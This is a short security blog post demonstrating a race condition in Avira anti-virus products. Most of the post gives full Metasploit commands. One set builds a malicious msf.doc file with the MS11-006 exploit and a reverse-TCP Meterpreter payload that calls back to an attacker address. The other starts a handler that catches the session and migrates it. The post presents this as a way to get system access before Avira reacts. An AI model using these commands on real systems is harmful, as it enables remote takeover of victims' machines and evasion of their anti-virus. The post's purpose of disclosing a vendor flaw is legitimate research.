aka wow on ZATAZ.com
Metasploit Meterpreter race condition against Avira anti-virus
This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.
We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.
As you will see, the installed “Avira AntiVir Personal” anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.
The demonstrated product is an update-to-date “Avira AntiVir Personal”. But this race condition appear for others Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite“.
Metasploit commands :
To create the msf.doc file to exploit MS11-06 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
Demonstration video :
I recommend you to read these related posts
- Metasploit Meterpreter race condition against Emsisoft Anti-Malware
- Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
- Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo
- 10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?
- Clamav antivirus blocking Yahoo, Apple HTML.IFrame-39
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo
- Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration
- CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo
